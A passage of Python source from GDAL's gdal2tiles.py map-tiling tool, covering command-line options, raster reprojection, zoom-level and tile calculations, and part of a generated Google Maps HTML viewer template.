p.add_option("-x", "--xyz",
action='store_true', dest='xyz',
help="Use XYZ tile numbering instead of TMS")
p.add_option("-v", "--verbose",
action="store_true", dest="verbose",
help="Print status messages to stdout")
p.add_option("-q", "--quiet",
action="store_true", dest="quiet",
help="Disable messages and status to stdout")
p.add_option("--processes",
dest="nb_processes",
type='int',
help="Number of processes to use for tiling")
# KML options
g = OptionGroup(p, "KML (Google Earth) options",
"Options for generated Google Earth SuperOverlay metadata")
g.add_option("-k", "--force-kml", dest='kml', action="store_true",
help=("Generate KML for Google Earth - default for 'geodetic' profile and "
"'raster' in EPSG:4326. For a dataset with different projection use "
"with caution!"))
g.add_option("-n", "--no-kml", dest='kml', action="store_false",
help="Avoid automatic generation of KML files for EPSG:4326")
g.add_option("-u", "--url", dest='url',
help="URL address where the generated tiles are going to be published")
p.add_option_group(g)
# HTML options
g = OptionGroup(p, "Web viewer options",
"Options for generated HTML viewers a la Google Maps")
g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
g.add_option("-t", "--title", dest='title',
help="Title of the map")
g.add_option("-c", "--copyright", dest='copyright',
help="Copyright for the map")
g.add_option("-g", "--googlekey", dest='googlekey',
help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
g.add_option("-b", "--bingkey", dest='bingkey',
help="Bing Maps API key from https://www.bingmapsportal.com/")
p.add_option_group(g)
p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
webviewer='all', copyright='', resampling='average', resume=False,
googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
processes=1)
return p
def process_args(argv):
parser = optparse_init()
options, args = parser.parse_args(args=argv)
# Args should be either an input file OR an input file and an output folder
if (len(args) == 0):
exit_with_error("You need to specify at least an input file as argument to the script")
if (len(args) > 2):
exit_with_error("Processing of several input files is not supported.",
"Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
"files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args))
input_file = args[0]
if not os.path.isfile(input_file):
exit_with_error("The provided input file %s does not exist or is not a file" % input_file)
if len(args) == 2:
output_folder = args[1]
else:
output_folder = os.path.basename(input_file)
options = options_post_processing(options, input_file, output_folder)
return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
if not options.title:
options.title = os.path.basename(input_file)
if options.url and not options.url.endswith('/'):
options.url += '/'
if options.url:
out_path = output_folder
if out_path.endswith("/"):
out_path = out_path[:-1]
options.url += os.path.basename(out_path) + '/'
# Supported options
if options.resampling == 'average':
try:
if gdal.RegenerateOverview:
pass
except Exception:
exit_with_error("'average' resampling algorithm is not available.",
"Please use -r 'near' argument or upgrade to newer version of GDAL.")
elif options.resampling == 'antialias':
try:
if numpy: # pylint:disable=W0125
pass
except Exception:
exit_with_error("'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy.")
try:
os.path.basename(input_file).encode('ascii')
except UnicodeEncodeError:
full_ascii = False
else:
full_ascii = True
# LC_CTYPE check
if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""):
if not options.quiet:
print("\nWARNING: "
"You are running gdal2tiles.py with a LC_CTYPE environment variable that is "
"not UTF-8 compatible, and your input file contains non-ascii characters. "
"The generated sample googlemaps, openlayers or "
"leaflet files might contain some invalid characters as a result\n")
# Output the results
if options.verbose:
print("Options:", options)
print("Input:", input_file)
print("Output:", output_folder)
print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024))
print('')
return options
class TileDetail(object):
tx = 0
ty = 0
tz = 0
rx = 0
ry = 0
rxsize = 0
rysize = 0
wx = 0
wy = 0
wxsize = 0
wysize = 0
querysize = 0
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __str__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
def __repr__(self):
return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz)
class TileJobInfo(object):
"""
Plain object to hold tile job configuration for a dataset
"""
src_file = ""
nb_data_bands = 0
output_file_path = ""
tile_extension = ""
tile_size = 0
tile_driver = None
kml = False
tminmax = []
tminz = 0
tmaxz = 0
in_srs_wkt = 0
out_geo_trans = []
ominy = 0
is_epsg_4326 = False
options = None
def __init__(self, **kwargs):
for key in kwargs:
if hasattr(self, key):
setattr(self, key, kwargs[key])
def __unicode__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __str__(self):
return "TileJobInfo %s\n" % (self.src_file)
def __repr__(self):
return "TileJobInfo %s\n" % (self.src_file)
class Gdal2TilesError(Exception):
pass
class GDAL2Tiles(object):
def __init__(self, input_file, output_folder, options):
"""Constructor function - initialization"""
self.out_drv = None
self.mem_drv = None
self.warped_input_dataset = None
self.out_srs = None
self.nativezoom = None
self.tminmax = None
self.tsize = None
self.mercator = None
self.geodetic = None
self.alphaband = None
self.dataBandsCount = None
self.out_gt = None
self.tileswne = None
self.swne = None
self.ominx = None
self.omaxx = None
self.omaxy = None
self.ominy = None
self.input_file = None
self.output_folder = None
# Tile format
self.tilesize = 256
self.tiledriver = 'PNG'
self.tileext = 'png'
self.tmp_dir = tempfile.mkdtemp()
self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt')
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorightm
self.querysize = 4 * self.tilesize
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from existing underlying tiles
self.overviewquery = False
self.input_file = input_file
self.output_folder = output_folder
self.options = options
if self.options.resampling == 'near':
self.querysize = self.tilesize
elif self.options.resampling == 'bilinear':
self.querysize = self.tilesize * 2
# User specified zoom levels
self.tminz = None
self.tmaxz = None
if self.options.zoom:
minmax = self.options.zoom.split('-', 1)
minmax.extend([''])
zoom_min, zoom_max = minmax[:2]
self.tminz = int(zoom_min)
if zoom_max:
self.tmaxz = int(zoom_max)
else:
self.tmaxz = int(zoom_min)
# KML generation
self.kml = self.options.kml
# -------------------------------------------------------------------------
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
gdal.AllRegister()
self.out_drv = gdal.GetDriverByName(self.tiledriver)
self.mem_drv = gdal.GetDriverByName('MEM')
if not self.out_drv:
raise Exception("The '%s' driver was not found, is it available in this GDAL build?",
self.tiledriver)
if not self.mem_drv:
raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?")
# Open the input file
if self.input_file:
input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly)
else:
raise Exception("No input file was specified")
if self.options.verbose:
print("Input file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
if not input_dataset:
# Note: GDAL prints the ERROR message too
exit_with_error("It is not possible to open the input file '%s'." % self.input_file)
# Read metadata from the input file
if input_dataset.RasterCount == 0:
exit_with_error("Input file '%s' has no raster band" % self.input_file)
if input_dataset.GetRasterBand(1).GetRasterColorTable():
exit_with_error(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
"From paletted file you can create RGBA file (temp.vrt) by:\n"
"gdal_translate -of vrt -expand rgba %s temp.vrt\n"
"then run:\n"
"gdal2tiles temp.vrt" % self.input_file
)
in_nodata = setup_no_data_values(input_dataset, self.options)
if self.options.verbose:
print("Preprocessed file:",
"( %sP x %sL - %s bands)" % (input_dataset.RasterXSize,
input_dataset.RasterYSize,
input_dataset.RasterCount))
in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options)
self.out_srs = setup_output_srs(in_srs, self.options)
# If input and output reference systems are different, we reproject the input dataset into
# the output reference system for easier manipulation
self.warped_input_dataset = None
if self.options.profile in ('mercator', 'geodetic'):
if not in_srs:
exit_with_error(
"Input file has unknown SRS.",
"Use --s_srs ESPG:xyz (or similar) to provide source reference system.")
if not has_georeference(input_dataset):
exit_with_error(
"There is no georeference - neither affine transformation (worldfile) "
"nor GCPs. You can generate only 'raster' profile tiles.",
"Either gdal2tiles with parameter -p 'raster' or use another GIS "
"software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs"
)
if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or
(input_dataset.GetGCPCount() != 0)):
self.warped_input_dataset = reproject_dataset(
input_dataset, in_srs, self.out_srs)
if in_nodata:
self.warped_input_dataset = update_no_data_values(
self.warped_input_dataset, in_nodata, options=self.options)
else:
self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs(
self.warped_input_dataset, options=self.options)
if self.warped_input_dataset and self.options.verbose:
print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % (
self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize,
self.warped_input_dataset.RasterCount))
if not self.warped_input_dataset:
self.warped_input_dataset = input_dataset
self.warped_input_dataset.GetDriver().CreateCopy(self.tmp_vrt_filename,
self.warped_input_dataset)
# Get alpha band (either directly or from NODATA value)
self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand()
self.dataBandsCount = nb_data_bands(self.warped_input_dataset)
# KML test
self.isepsg4326 = False
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4():
self.kml = True
self.isepsg4326 = True
if self.options.verbose:
print("KML autotest OK!")
# Read the georeference
self.out_gt = self.warped_input_dataset.GetGeoTransform()
# Test the size of the pixel
# Report error in case rotation/skew is in geotransform (possible only in 'raster' profile)
if (self.out_gt[2], self.out_gt[4]) != (0, 0):
exit_with_error("Georeference of the raster contains rotation or skew. "
"Such raster is not supported. Please use gdalwarp first.")
# Here we expect: pixel is square, no rotation on the raster
# Output Bounds - coordinates in the output SRS
self.ominx = self.out_gt[0]
self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1]
self.omaxy = self.out_gt[3]
self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1]
# Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15
if self.options.verbose:
print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy)
# Calculating ranges for tiles in different zoom levels
if self.options.profile == 'mercator':
self.mercator = GlobalMercator()
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.mercator.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**tz-1, tmaxx), min(2**tz-1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the minimal zoom level (map covers area equivalent to one tile)
if self.tminz is None:
self.tminz = self.mercator.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tilesize))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):",
self.mercator.MetersToLatLon(self.ominx, self.ominy),
self.mercator.MetersToLatLon(self.omaxx, self.omaxy))
print('MinZoomLevel:', self.tminz)
print("MaxZoomLevel:",
self.tmaxz,
"(",
self.mercator.Resolution(self.tmaxz),
")")
if self.options.profile == 'geodetic':
self.geodetic = GlobalGeodetic(self.options.tmscompatible)
# Function which generates SWNE in LatLong for given tile
self.tileswne = self.geodetic.TileLatLonBounds
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, 32))
for tz in range(0, 32):
tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz)
tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz)
# crop tiles extending world limits (+-180,+-90)
tminx, tminy = max(0, tminx), max(0, tminy)
tmaxx, tmaxy = min(2**(tz+1)-1, tmaxx), min(2**tz-1, tmaxy)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# TODO: Maps crossing 180E (Alaska?)
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tminz is None:
self.tminz = self.geodetic.ZoomForPixelSize(
self.out_gt[1] *
max(self.warped_input_dataset.RasterXSize,
self.warped_input_dataset.RasterYSize) /
float(self.tilesize))
# Get the maximal zoom level
# (closest possible zoom level up on the resolution of raster)
if self.tmaxz is None:
self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1])
if self.options.verbose:
print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.profile == 'raster':
def log2(x):
return math.log10(x) / math.log10(2)
self.nativezoom = int(
max(math.ceil(log2(self.warped_input_dataset.RasterXSize/float(self.tilesize))),
math.ceil(log2(self.warped_input_dataset.RasterYSize/float(self.tilesize)))))
if self.options.verbose:
print("Native zoom of the raster:", self.nativezoom)
# Get the minimal zoom level (whole raster in one tile)
if self.tminz is None:
self.tminz = 0
# Get the maximal zoom level (native resolution of the raster)
if self.tmaxz is None:
self.tmaxz = self.nativezoom
# Generate table with min max tile coordinates for all zoomlevels
self.tminmax = list(range(0, self.tmaxz+1))
self.tsize = list(range(0, self.tmaxz+1))
for tz in range(0, self.tmaxz+1):
tsize = 2.0**(self.nativezoom-tz)*self.tilesize
tminx, tminy = 0, 0
tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1
tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1
self.tsize[tz] = math.ceil(tsize)
self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy)
# Function which generates SWNE in LatLong for given tile
if self.kml and self.in_srs_wkt:
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2**(self.tmaxz-z) * self.out_gt[1]) # X-pixel size in level
west = self.out_gt[0] + x*self.tilesize*pixelsizex
east = west + self.tilesize*pixelsizex
south = self.ominy + y*self.tilesize*pixelsizex
north = south + self.tilesize*pixelsizex
if not self.isepsg4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
self.tileswne = rastertileswne
else:
self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa
def generate_metadata(self):
"""
Generation of main metadata files and HTML viewers (metadata related to particular
tiles are generated during the tile processing).
"""
if not os.path.exists(self.output_folder):
os.makedirs(self.output_folder)
if self.options.profile == 'mercator':
south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy)
north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy)
south, west = max(-85.05112878, south), max(-180.0, west)
north, east = min(85.05112878, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate googlemaps.html
if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator':
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))):
with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f:
f.write(self.generate_googlemaps().encode('utf-8'))
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate leaflet.html
if self.options.webviewer in ('all', 'leaflet'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))):
with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f:
f.write(self.generate_leaflet().encode('utf-8'))
elif self.options.profile == 'geodetic':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
south, west = max(-90.0, south), max(-180.0, west)
north, east = min(90.0, north), min(180.0, east)
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
elif self.options.profile == 'raster':
west, south = self.ominx, self.ominy
east, north = self.omaxx, self.omaxy
self.swne = (south, west, north, east)
# Generate openlayers.html
if self.options.webviewer in ('all', 'openlayers'):
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))):
with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f:
f.write(self.generate_openlayers().encode('utf-8'))
# Generate tilemapresource.xml.
if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')):
with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f:
f.write(self.generate_tilemapresource().encode('utf-8'))
if self.kml:
# TODO: Maybe problem for not automatically generated tminz
# The root KML should contain links to all tiles in the tminz level
children = []
xmin, ymin, xmax, ymax = self.tminmax[self.tminz]
for x in range(xmin, xmax+1):
for y in range(ymin, ymax+1):
children.append([x, y, self.tminz])
# Generate Root KML
if self.kml:
if (not self.options.resume or not
os.path.exists(os.path.join(self.output_folder, 'doc.kml'))):
with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f:
f.write(generate_kml(
None, None, None, self.tileext, self.tilesize, self.tileswne,
self.options, children
).encode('utf-8'))
def generate_base_tiles(self):
"""
Generation of the base tiles (the lowest in the pyramid) directly from the input raster
"""
if not self.options.quiet:
print("Generating Base Tiles:")
if self.options.verbose:
print('')
print("Tiles generated from the max zoom level:")
print("----------------------------------------")
print('')
# Set the bounds
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
ds = self.warped_input_dataset
tilebands = self.dataBandsCount + 1
querysize = self.querysize
if self.options.verbose:
print("dataBandsCount: ", self.dataBandsCount)
print("tilebands: ", tilebands)
tcount = (1+abs(tmaxx-tminx)) * (1+abs(tmaxy-tminy))
ti = 0
tile_details = []
tz = self.tmaxz
for ty in range(tmaxy, tminy-1, -1):
for tx in range(tminx, tmaxx+1):
ti += 1
ytile = GDAL2Tiles.getYtile(ty, tz, self.options)
tilefilename = os.path.join(
self.output_folder, str(tz), str(tx), "%s.%s" % (ytile, self.tileext))
if self.options.verbose:
print(ti, '/', tcount, tilefilename)
if self.options.resume and os.path.exists(tilefilename):
if self.options.verbose:
print("Tile generation skipped because of --resume")
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
if self.options.profile == 'mercator':
# Tile bounds in EPSG:3857
b = self.mercator.TileBounds(tx, ty, tz)
elif self.options.profile == 'geodetic':
b = self.geodetic.TileBounds(tx, ty, tz)
# Don't scale up by nearest neighbour, better change the querysize
# to the native resolution (and return smaller query tile) for scaling
if self.options.profile in ('mercator', 'geodetic'):
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1])
# Pixel size in the raster covering query geo extent
nativesize = wb[0] + wb[2]
if self.options.verbose:
print("\tNative Extent (querysize", nativesize, "): ", rb, wb)
# Tile bounds in raster coordinates for ReadRaster query
rb, wb = self.geo_query(ds, b[0], b[3], b[2], b[1], querysize=querysize)
rx, ry, rxsize, rysize = rb
wx, wy, wxsize, wysize = wb
else: # 'raster' profile:
tsize = int(self.tsize[tz]) # tilesize in raster coordinates for actual zoom
xsize = self.warped_input_dataset.RasterXSize # size of the raster in pixels
ysize = self.warped_input_dataset.RasterYSize
if tz >= self.nativezoom:
querysize = self.tilesize
rx = (tx) * tsize
rxsize = 0
if tx == tmaxx:
rxsize = xsize % tsize
if rxsize == 0:
rxsize = tsize
rysize = 0
if ty == tmaxy:
rysize = ysize % tsize
if rysize == 0:
rysize = tsize
ry = ysize - (ty * tsize) - rysize
wx, wy = 0, 0
wxsize = int(rxsize/float(tsize) * self.tilesize)
wysize = int(rysize/float(tsize) * self.tilesize)
if wysize != self.tilesize:
wy = self.tilesize - wysize
# Read the source raster if anything is going inside the tile as per the computed
# geo_query
tile_details.append(
TileDetail(
tx=tx, ty=ytile, tz=tz, rx=rx, ry=ry, rxsize=rxsize, rysize=rysize, wx=wx,
wy=wy, wxsize=wxsize, wysize=wysize, querysize=querysize,
)
)
conf = TileJobInfo(
src_file=self.tmp_vrt_filename,
nb_data_bands=self.dataBandsCount,
output_file_path=self.output_folder,
tile_extension=self.tileext,
tile_driver=self.tiledriver,
tile_size=self.tilesize,
kml=self.kml,
tminmax=self.tminmax,
tminz=self.tminz,
tmaxz=self.tmaxz,
in_srs_wkt=self.in_srs_wkt,
out_geo_trans=self.out_gt,
ominy=self.ominy,
is_epsg_4326=self.isepsg4326,
options=self.options,
)
return conf, tile_details
def geo_query(self, ds, ulx, uly, lrx, lry, querysize=0):
"""
For given dataset and query in cartographic coordinates returns parameters for ReadRaster()
in raster coordinates and x/y shifts (for border tiles). If the querysize is not given, the
extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx+rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry+rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tilesize, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tilesize)d" height="%(tilesize)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz+1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom-z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339/2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125/2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tilesize'] = self.tilesize
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
